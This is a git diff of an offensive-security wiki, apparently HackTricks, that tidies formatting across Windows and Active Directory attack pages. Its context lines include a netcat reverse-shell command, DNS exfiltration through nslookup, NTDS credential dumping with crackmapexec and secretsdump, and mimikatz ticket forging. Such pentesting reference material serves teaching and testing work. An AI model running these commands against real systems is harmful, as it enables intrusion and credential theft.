connection is secured, **LDAPS** or when the authentication type is ‘Sealing & Secure’ for an example. +gMSA accounts have their passwords stored in a LDAP property called _**msDS-ManagedPassword**_ which **automatically** get **resets** by the DC’s every 30 days, are **retrievable** by **authorized administrators** and by the **servers** who they are installed on. _**msDS-ManagedPassword**_ is an encrypted data blob called [MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) and it’s only retrievable when the connection is secured, **LDAPS** or when the authentication type is ‘Sealing & Secure’ for an example. ![Image from https://cube0x0.github.io/Relaying-for-gMSA/](../../.gitbook/assets/asd1.png) @@ -237,7 +237,7 @@ PCWSTR pPathSourceReg = L"\\Registry\\User\\\\System\\CurrentControlSe The first one declares a string variable indicating where the vulnerable **Capcom.sys** driver is located on the victim system and the second one is a string variable indicating a service name that will be used (could be any service).\ Note, that the **driver must be signed by Windows** so you cannot load arbitrary drivers. But, **Capcom.sys** **can be abused to execute arbitrary code and is signed by Windows**, so the goal is to load this driver and exploit it. - Load the driver: +Load the driver: ```c #include "stdafx.h" diff --git a/windows/active-directory-methodology/resource-based-constrained-delegation.md b/windows/active-directory-methodology/resource-based-constrained-delegation.md index e635e210..1096c251 100644 --- a/windows/active-directory-methodology/resource-based-constrained-delegation.md +++ b/windows/active-directory-methodology/resource-based-constrained-delegation.md @@ -22,8 +22,8 @@ However, if the **TGS** used in **S4U2Proxy** is **NOT Forwardable** trying to a Suppose that the attacker has already **write equivalent privileges over the victim computer**. 1. The attacker **compromises** an account that has a **SPN** or **creates one** (“Service A”). Note that **any** _Admin User_ without any other special privilege can **create** up until 10 **Computer objects (**_**MachineAccountQuota**_**)** and set them a **SPN**. So the attacker can just create a Computer object and set a SPN. -2. The attacker configures **resource-based constrained delegation from Service A to the victim host**. -3. The attacker uses Rubeus to perform a **full S4U attack** (S4U2Self and S4U2Proxy) from Service A to Service B for a user **with privileged access to Service B**. +2. The attacker configures **resource-based constrained delegation from Service A to the victim host**. +3. The attacker uses Rubeus to perform a **full S4U attack** (S4U2Self and S4U2Proxy) from Service A to Service B for a user **with privileged access to Service B**. 1. S4U2Self (from the SPN compromised/created account): Ask for a **TGS of Administrator to me** (Not Forwardable). 2. S4U2Proxy: Use the **not Forwardable TGS** of the step before to ask for a **TGS** from **Administrator** to the **victim host**. 3. Even if you are using a not Forwardable TGS, as you are exploiting Resource-based constrained delegation, it will work. diff --git a/windows/active-directory-methodology/silver-ticket.md b/windows/active-directory-methodology/silver-ticket.md index 0d620f81..19f34fc1 100644 --- a/windows/active-directory-methodology/silver-ticket.md +++ b/windows/active-directory-methodology/silver-ticket.md @@ -40,7 +40,7 @@ Silver ticket events ID \(more stealth than golden ticket\): * 4634: Account Logoff * 4672: Admin Logon -\*\*\*\*[**More information about Silver Tickets in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets)\*\*\*\* +[**More information about Silver Tickets in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets) ## Available Services diff --git a/windows/active-directory-methodology/skeleton-key.md b/windows/active-directory-methodology/skeleton-key.md index 372c86d7..5c7db428 100644 --- a/windows/active-directory-methodology/skeleton-key.md +++ b/windows/active-directory-methodology/skeleton-key.md @@ -2,7 +2,7 @@ ## **Skeleton Key** -**From:** [**https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/**](https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/)**** +**From:** [**https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/**](https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/) There are several methods for compromising Active Directory accounts that attackers can use to elevate privileges and create persistence once they have established themselves in your domain. The Skeleton Key is a particularly scary piece of malware targeted at Active Directory domains to make it alarmingly easy to hijack any account. This malware **injects itself into LSASS and creates a master password that will work for any account in the domain**. Existing passwords will also continue to work, so it is very difficult to know this attack has taken place unless you know what to look for. @@ -18,11 +18,11 @@ Performing the attack is very straightforward to do. It only requires the follow ![Injecting a skeleton key using the misc::skeleton into a domain controller with Mimikatz](https://blog.stealthbits.com/wp-content/uploads/2017/07/1-3.png) -Here is an authentication for a Domain Admin member using the skeleton key as a password to get administrative access to a domain controller: +Here is an authentication for a Domain Admin member using the skeleton key as a password to get administrative access to a domain controller: ![Using the skeleton key as a password with the misc::skeleton command to get administrative access to a domain controller with the default password of Mimikatz](https://blog.stealthbits.com/wp-content/uploads/2017/07/2-5.png) -Note: If you do get a message saying, “System error 86 has occurred. The specified network password is not correct”, just try using the domain\account format for the username and it should work. +Note: If you do get a message saying, “System error 86 has occurred. The specified network password is not correct”, just try using the domain\account format for the username and it should work. ![Using the domain\account format for the username if you get a message saying System error 86 has occurred The specified network password is not correct](https://blog.stealthbits.com/wp-content/uploads/2017/07/3-3.png) diff --git a/windows/active-directory-methodology/unconstrained-delegation.md b/windows/active-directory-methodology/unconstrained-delegation.md index cc5a053d..72a2482f 100644 --- a/windows/active-directory-methodology/unconstrained-delegation.md +++ b/windows/active-directory-methodology/unconstrained-delegation.md @@ -6,7 +6,7 @@ This a feature that a Domain Administrator can set to any **Computer** inside th So if a domain admin logins inside a Computer with "Unconstrained Delegation" feature activated, and you have local admin privileges inside that machine, you will be able to dump the ticket and impersonate the Domain Admin anywhere (domain privesc). - You can **find Computer objects with this attribute** checking if the [userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832\(v=vs.85\).aspx) attribute contains [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx). You can do this with an LDAP filter of ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, which is what powerview does: +You can **find Computer objects with this attribute** checking if the [userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832\(v=vs.85\).aspx) attribute contains [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx). You can do this with an LDAP filter of ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, which is what powerview does: ```bash Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc @@ -18,7 +18,7 @@ kerberos::list /export #Another way Load the ticket of Administrator (or victim user) in memory with **Mimikatz** or **Rubeus for a** [**Pass the Ticket**](pass-the-ticket.md)**.**\ More info: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\ -[**More information about Unconstrained delegation in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)**** +[**More information about Unconstrained delegation in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation) ### **Automatically compromising a Print server** @@ -32,7 +32,7 @@ To make a print server login against any machine you can use [**SpoolSample**](h ``` If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse.md#dcsync) and obtain all the hashes from the DC.\ -[**More info about this attack in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)**** +[**More info about this attack in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation) ### Mitigation diff --git a/windows/authentication-credentials-uac-and-efs.md b/windows/authentication-credentials-uac-and-efs.md index 6a1d9ab2..2eee6294 100644 --- a/windows/authentication-credentials-uac-and-efs.md +++ b/windows/authentication-credentials-uac-and-efs.md @@ -8,16 +8,16 @@ The SSPI will be in charge of finding the adequate protocol for two machines tha ### Main SSPs -* **Kerberos**: The preferred one +* **Kerberos**: The preferred one * %windir%\Windows\System32\kerberos.dll -* **NTLMv1** and **NTLMv2**: Compatibility reasons +* **NTLMv1** and **NTLMv2**: Compatibility reasons * %windir%\Windows\System32\msv1\_0.dll -* **Digest**: Web servers and LDAP, password in form of a MD5 hash +* **Digest**: Web servers and LDAP, password in form of a MD5 hash * %windir%\Windows\System32\Wdigest.dll -* **Schannel**: SSL and TLS +* **Schannel**: SSL and TLS * %windir%\Windows\System32\Schannel.dll -* **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one) - * %windir%\Windows\System32\lsasrv.dll +* **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one) + * %windir%\Windows\System32\lsasrv.dll #### The negotiation could offer several methods or only one. @@ -149,9 +149,9 @@ Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10 #### UAC bypass exploits You could also use some tools to **bypass UAC like** [**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like_Source\Akagi\outout\x64\Debug\Akagi.exe_) , you will need to know **which one you need.**\ -****You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening. +You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening. -**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**. +**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**. #### More UAC bypass @@ -182,9 +182,9 @@ Consists on watching if an **autoElevated binary** tries to **read** from the ** EFS works by encrypting a file with a bulk **symmetric key**, also known as the File Encryption Key, or **FEK**. The FEK is then **encrypted** with a **public key** that is associated with the user who encrypted the file, and this encrypted FEK is stored in the $EFS **alternative data stream** of the encrypted file. To decrypt the file, the EFS component driver uses the **private key** that matches the EFS digital certificate (used to encrypt the file) to decrypt the symmetric key that is stored in the $EFS stream. From [here](https://en.wikipedia.org/wiki/Encrypting\_File\_System). -Examples of files being decrypted without the user asking for it: +Examples of files being decrypted without the user asking for it: -* Files and folders are decrypted before being copied to a volume formatted with another file system, like [FAT32](https://en.wikipedia.org/wiki/File\_Allocation\_Table). +* Files and folders are decrypted before being copied to a volume formatted with another file system, like [FAT32](https://en.wikipedia.org/wiki/File\_Allocation\_Table). * Encrypted files are copied over the network using the SMB/CIFS protocol, the files are decrypted before they are sent over the network. The encrypted files using this method can be **tansparently access by the owner user** (the one who has encrypted them), so if you can **become that user** you can decrypt the files (changing the password of the user and logins as him won't work). @@ -196,7 +196,7 @@ Check if a **user** has **used** this **service** checking if this path exists:` Check **who** has **access** to the file using cipher /c \\ You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files -### Decrypting EFS files +### Decrypting EFS files #### Being Authority System diff --git a/windows/av-bypass.md b/windows/av-bypass.md index 66485f5a..215be0ec 100644 --- a/windows/av-bypass.md +++ b/windows/av-bypass.md @@ -77,7 +77,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml ## Compiling our own reverse shell - https://medium.com/@Bank\_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15 +https://medium.com/@Bank\_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15 #### First C# Revershell diff --git a/windows/basic-cmd-for-pentesters.md b/windows/basic-cmd-for-pentesters.md index 9782546d..139ccc48 100644 --- a/windows/basic-cmd-for-pentesters.md +++ b/windows/basic-cmd-for-pentesters.md @@ -440,7 +440,7 @@ sudo tcpdump -i -A proto udp and dst port 53 and dst ip #Passi #### Victim -_**for /f tokens**_ \_\*\*\_technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server +_**for /f tokens**_ \_**\_technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server ```text for /f %a in ('whoami') do nslookup %a #Get whoami diff --git a/windows/checklist-windows-privilege-escalation.md b/windows/checklist-windows-privilege-escalation.md index ac908ac2..754aae2f 100644 --- a/windows/checklist-windows-privilege-escalation.md +++ b/windows/checklist-windows-privilege-escalation.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} diff --git a/windows/ntlm/README.md b/windows/ntlm/README.md index 9bae2e5d..22fb7e78 100644 --- a/windows/ntlm/README.md +++ b/windows/ntlm/README.md @@ -110,7 +110,7 @@ This will launch a process that will belongs to the users that have launch mimik ### Pass-the-Hash from linux You can obtain code execution in Windows machines using Pass-the-Hash from Linux. \ -[**Access here to learn how to do it.**](broken-reference)**** +[**Access here to learn how to do it.**](broken-reference) ### Impacket Windows compiled tools @@ -171,10 +171,10 @@ wce.exe -s ::: ### Manual Windows remote execution with username and password -* ****[**PsExec**](psexec-and-winexec.md)**** -* [**SmbExec**](smbexec.md)**** -* ****[**WmicExec**](wmicexec.md)**** -* ****[**AtExec**](atexec.md)**** +* [**PsExec**](psexec-and-winexec.md) +* [**SmbExec**](smbexec.md) +* [**WmicExec**](wmicexec.md) +* [**AtExec**](atexec.md) ## Extracting credentials from a Windows Host @@ -190,4 +190,4 @@ wce.exe -s ::: ## Parse NTLM challenges from a network capture -**You can use** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide)**** +**You can use** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide) diff --git a/windows/ntlm/places-to-steal-ntlm-creds.md b/windows/ntlm/places-to-steal-ntlm-creds.md index 4d7ed02e..15890bcd 100644 --- a/windows/ntlm/places-to-steal-ntlm-creds.md +++ b/windows/ntlm/places-to-steal-ntlm-creds.md @@ -665,6 +665,6 @@ There might be many other ways in Windows. You never know! 🙂 ## References -* [**https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/**](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)\*\*\*\* +* [**https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/**](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) * [https://attack.mitre.org/techniques/T1187/](https://attack.mitre.org/techniques/T1187/) diff --git a/windows/stealing-credentials/README.md b/windows/stealing-credentials/README.md index cd9b1d7f..8a12414e 100644 --- a/windows/stealing-credentials/README.md +++ b/windows/stealing-credentials/README.md @@ -112,7 +112,7 @@ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds #~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss ``` -### Dump the NTDS.dit password history from target DC +### Dump the NTDS.dit password history from target DC ``` #~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history @@ -238,7 +238,7 @@ secretsdump.py -just-dc-ntlm /@ For **big NTDS.dit files** it's recommend to extract it using [gosecretsdump](https://github.com/c-sto/gosecretsdump). -Finally, you can also use the **metasploit module**: _post/windows/gather/credentials/domain\_hashdump_ or **mimikatz** `lsadump::lsa /inject` +Finally, you can also use the **metasploit module**: _post/windows/gather/credentials/domain\_hashdump_ or **mimikatz** `lsadump::lsa /inject` ## Lazagne @@ -279,4 +279,4 @@ Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco ## Defenses -****[**Learn about some credentials protections here.**](credentials-protections.md)**** +[**Learn about some credentials protections here.**](credentials-protections.md) diff --git a/windows/stealing-credentials/credentials-mimikatz.md b/windows/stealing-credentials/credentials-mimikatz.md index e105d069..29fbc8b4 100644 --- a/windows/stealing-credentials/credentials-mimikatz.md +++ b/windows/stealing-credentials/credentials-mimikatz.md @@ -96,10 +96,10 @@ The following Mimikatz command creates a Silver Ticket for the CIFS service on t mimikatz “kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit ``` -#### ****[**Trust Ticket**](https://adsecurity.org/?p=1588)**** +#### [**Trust Ticket**](https://adsecurity.org/?p=1588) Once the Active Directory Trust password hash is determined, a trust ticket can be generated. The trust tickets are created using the shared password between 2 Domains that trust each other.\ -****[More background on Trust Tickets.](https://adsecurity.org/?p=1588) +[More background on Trust Tickets.](https://adsecurity.org/?p=1588) **Dumping trust passwords (trust keys)** @@ -125,7 +125,7 @@ Trust Ticket Specific Required Parameters: #### **More KERBEROS** **KERBEROS::List** – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.\ -****Similar to functionality of “klist”. +Similar to functionality of “klist”. **KERBEROS::PTC** – pass the cache (NT6)\ \*Nix systems like Mac OS, Linux,BSD, Unix, etc cache Kerberos credentials. This cached data can be copied off and passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files. diff --git a/windows/windows-local-privilege-escalation/README.md b/windows/windows-local-privilege-escalation/README.md index 650656a6..b86bb16f 100644 --- a/windows/windows-local-privilege-escalation/README.md +++ b/windows/windows-local-privilege-escalation/README.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -211,7 +211,7 @@ You can exploit this vulnerability using the tool [**WSUSpicious**](https://gith ## AlwaysInstallElevated -**If** these 2 registers are **enabled** (value is **0x1**), then users of any privilege can **install** (execute) \*\* `*.msi`\*\* files as NT AUTHORITY\\**SYSTEM**. +**If** these 2 registers are **enabled** (value is **0x1**), then users of any privilege can **install** (execute) ** `*.msi`** files as NT AUTHORITY\\**SYSTEM**. ```bash reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated @@ -253,7 +253,7 @@ Read this tutorial to learn how to create a MSI wrapper using this tools. Note t ### MSI Installation -To execute the **installation** of the \*\*malicious `.msi` \*\* file in **background:** +To execute the **installation** of the **malicious `.msi` ** file in **background:** ``` msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi @@ -1121,7 +1121,7 @@ Search for a file called **SiteList.xml** Before KB2928120 (see MS14-025), some Group Policy Preferences could be configured with a custom account. This feature was mainly used to deploy a custom local administrator account on a group of machines. There were two problems with this approach though. First, since the Group Policy Objects are stored as XML files in SYSVOL, any domain user can read them. The second problem is that the password set in these GPPs is AES256-encrypted with a default key, which is publicly documented. This means that any authenticated user could potentially access very sensitive data and elevate their privileges on their machine or even the domain. This function will check whether any locally cached GPP file contains a non-empty "cpassword" field. If so, it will decrypt it and return a custom PS object containing some information about the GPP along with the location of the file. -Search in \*\* **\_**C:\ProgramData\Microsoft\Group Policy\history\*\* \_ or in _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (previous to W Vista)_ for these files: +Search in ** **\_**C:\ProgramData\Microsoft\Group Policy\history** \_ or in _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (previous to W Vista)_ for these files: * Groups.xml * Services.xml @@ -1406,7 +1406,7 @@ Using this technique is usually **selected any process running as SYSTEM with al ### **Named Pipes** -This technique is used by meterpreter to escalate in `getsystem`. The technique consists on **creating a pipe and then create/abuse a service to write on that pipe**. Then, the **server** that created the pipe using the \*\*`SeImpersonate` \*\* privilege will be able to **impersonate the token** of the pipe client (the service) obtaining SYSTEM privileges.\ +This technique is used by meterpreter to escalate in `getsystem`. The technique consists on **creating a pipe and then create/abuse a service to write on that pipe**. Then, the **server** that created the pipe using the **`SeImpersonate` ** privilege will be able to **impersonate the token** of the pipe client (the service) obtaining SYSTEM privileges.\ If you want to [**learn more about name pipes you should read this**](./#named-pipe-client-impersonation).\ If you want to read an example of [**how to go from high integrity to System using name pipes you should read this**](from-high-integrity-to-system-with-name-pipes.md). diff --git a/windows/windows-local-privilege-escalation/access-tokens.md b/windows/windows-local-privilege-escalation/access-tokens.md index 3dd310ed..b8ed6ad5 100644 --- a/windows/windows-local-privilege-escalation/access-tokens.md +++ b/windows/windows-local-privilege-escalation/access-tokens.md @@ -50,7 +50,7 @@ SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled ``` - or using _Process Explorer_ from Sysinternals (select process and access"Security" tab): +or using _Process Explorer_ from Sysinternals (select process and access"Security" tab): ![](<../../.gitbook/assets/image (321).png>) @@ -81,12 +81,12 @@ This is useful if you have useful credentials to access objects in the network b There are two types of tokens available: * **Primary token**: Primary tokens can only be **associated to processes**, and they represent a process's security subject. The creation of primary tokens and their association to processes are both privileged operations, requiring two different privileges in the name of privilege separation - the typical scenario sees the authentication service creating the token, and a logon service associating it to the user's operating system shell. Processes initially inherit a copy of the parent process's primary token. -* **Impersonation token**: Impersonation is a security concept implemented in Windows NT that **allows** a server application to **temporarily** "**be**" **the client** in terms of access to secure objects. Impersonation has **four possible levels**: +* **Impersonation token**: Impersonation is a security concept implemented in Windows NT that **allows** a server application to **temporarily** "**be**" **the client** in terms of access to secure objects. Impersonation has **four possible levels**: * **anonymous**, giving the server the access of an anonymous/unidentified user * **identification**, letting the server inspect the client's identity but not use that identity to access objects * **impersonation**, letting the server act on behalf of the client - * **delegation**, same as impersonation but extended to remote systems to which the server connects (through the preservation of credentials). + * **delegation**, same as impersonation but extended to remote systems to which the server connects (through the preservation of credentials). The client can choose the maximum impersonation level (if any) available to the server as a connection parameter. Delegation and impersonation are privileged operations (impersonation initially was not, but historical carelessness in the implementation of client APIs failing to restrict the default level to "identification", letting an unprivileged server impersonate an unwilling privileged client, called for it). **Impersonation tokens can only be associated to threads**, and they represent a client process's security subject. Impersonation tokens are usually created and associated to the current thread implicitly, by IPC mechanisms such as DCE RPC, DDE and named pipes. diff --git a/windows/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md b/windows/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md index 698bf27c..04d3505f 100644 --- a/windows/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md +++ b/windows/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md @@ -1,6 +1,6 @@ # AppendData/AddSubdirectory permission over service registry -**Information copied from** [**https://itm4n.github.io/windows-registry-rpceptmapper-eop/**](https://itm4n.github.io/windows-registry-rpceptmapper-eop/)**** +**Information copied from** [**https://itm4n.github.io/windows-registry-rpceptmapper-eop/**](https://itm4n.github.io/windows-registry-rpceptmapper-eop/) According to the output of the script, the current user has some write permissions on two registry keys: diff --git a/windows/windows-local-privilege-escalation/create-msi-with-wix.md b/windows/windows-local-privilege-escalation/create-msi-with-wix.md index e39278b8..a04790f2 100644 --- a/windows/windows-local-privilege-escalation/create-msi-with-wix.md +++ b/windows/windows-local-privilege-escalation/create-msi-with-wix.md @@ -37,7 +37,7 @@ fail_here ``` - We will use `candle.exe` from wixtools to create a wixobject from `msi.xml` +We will use `candle.exe` from wixtools to create a wixobject from `msi.xml` ```markup candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml diff --git a/windows/windows-local-privilege-escalation/dll-hijacking.md b/windows/windows-local-privilege-escalation/dll-hijacking.md index e402e9dc..85f899ff 100644 --- a/windows/windows-local-privilege-escalation/dll-hijacking.md +++ b/windows/windows-local-privilege-escalation/dll-hijacking.md @@ -47,7 +47,7 @@ You can see the **DLL search order on 32-bit** systems below: 1. The directory from which the application loaded. 2. The system directory. Use the [**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.(_C:\Windows\System32_) 3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched. (_C:\Windows\System_) -4. The Windows directory. Use the [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory. +4. The Windows directory. Use the [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory. 1. (_C:\Windows_) 5. The current directory. 6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path. @@ -104,7 +104,7 @@ Other interesting automated tools to discover this vulnerability are **PowerSplo ### Example In case you find an exploitable scenario one of the most important things to successfully exploit it would be to **create a dll that exports at least all the functions the executable will import from it**. Anyway, note that Dll Hijacking comes handy in order to [escalate from Medium Integrity level to High **(bypassing UAC)**](../authentication-credentials-uac-and-efs.md#uac) or from[ **High Integrity to SYSTEM**](./#from-high-integrity-to-system)**.** You can find an example of **how to create a valid dll** inside this dll hijacking study focused on dll hijacking for execution: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**.**\ -****Moreover, in the **next sectio**n you can find some **basic dll codes** that might be useful as **templates** or to create a **dll with non required functions exported**. +Moreover, in the **next sectio**n you can find some **basic dll codes** that might be useful as **templates** or to create a **dll with non required functions exported**. ## **Creating and compiling Dlls** diff --git a/windows/windows-local-privilege-escalation/dpapi-extracting-passwords.md b/windows/windows-local-privilege-escalation/dpapi-extracting-passwords.md index 9e7dd2b8..6d9f00d6 100644 --- a/windows/windows-local-privilege-escalation/dpapi-extracting-passwords.md +++ b/windows/windows-local-privilege-escalation/dpapi-extracting-passwords.md @@ -30,7 +30,7 @@ DPAPI is utilized to protect the following personal data: An example of a successful and clever way to protect data using DPAPI is the implementation of the auto-completion password encryption algorithm in Internet Explorer. To encrypt the login and password for a certain web page, it calls the CryptProtectData function, where in the optional entropy parameter it specifies the address of the web page. Thus, unless one knows the original URL where the password was entered, nobody, not even Internet Explorer itself, can decrypt that data back. {% endhint %} -## Master Keys +## Master Keys The DPAPI keys used for encrypting the user's RSA keys are stored under `%APPDATA%\Microsoft\Protect\{SID}` directory, where {SID} is the [Security Identifier](https://en.wikipedia.org/wiki/Security\_Identifier) of that user. **The DPAPI key is stored in the same file as the master key that protects the users private keys**. It usually is 64 bytes of random data. (Notice that this directory is protected so you cannot list it using`dir` from the cmd, but you can list it from PS). @@ -47,7 +47,7 @@ This is what a bunch of Master Keys of a user will looks like: ![](<../../.gitbook/assets/image (324).png>) -Usually **each master keys is an encrypted symmetric key that can decrypt other content**. Therefore, **extracting** the **encrypted Master Key** is interesting in order to **decrypt** later that **other content** encrypted with it. +Usually **each master keys is an encrypted symmetric key that can decrypt other content**. Therefore, **extracting** the **encrypted Master Key** is interesting in order to **decrypt** later that **other content** encrypted with it. ### Extract a master key @@ -121,7 +121,7 @@ You can find an example on how to encrypt and decrypt data with DPAPI using C# i ## DonPAPI -****[**DonPAPI**](https://github.com/login-securite/DonPAPI) can dump secrets protected by DPAPI automatically. +[**DonPAPI**](https://github.com/login-securite/DonPAPI) can dump secrets protected by DPAPI automatically. ## References diff --git a/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md b/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md index ca38c94d..a8bdb022 100644 --- 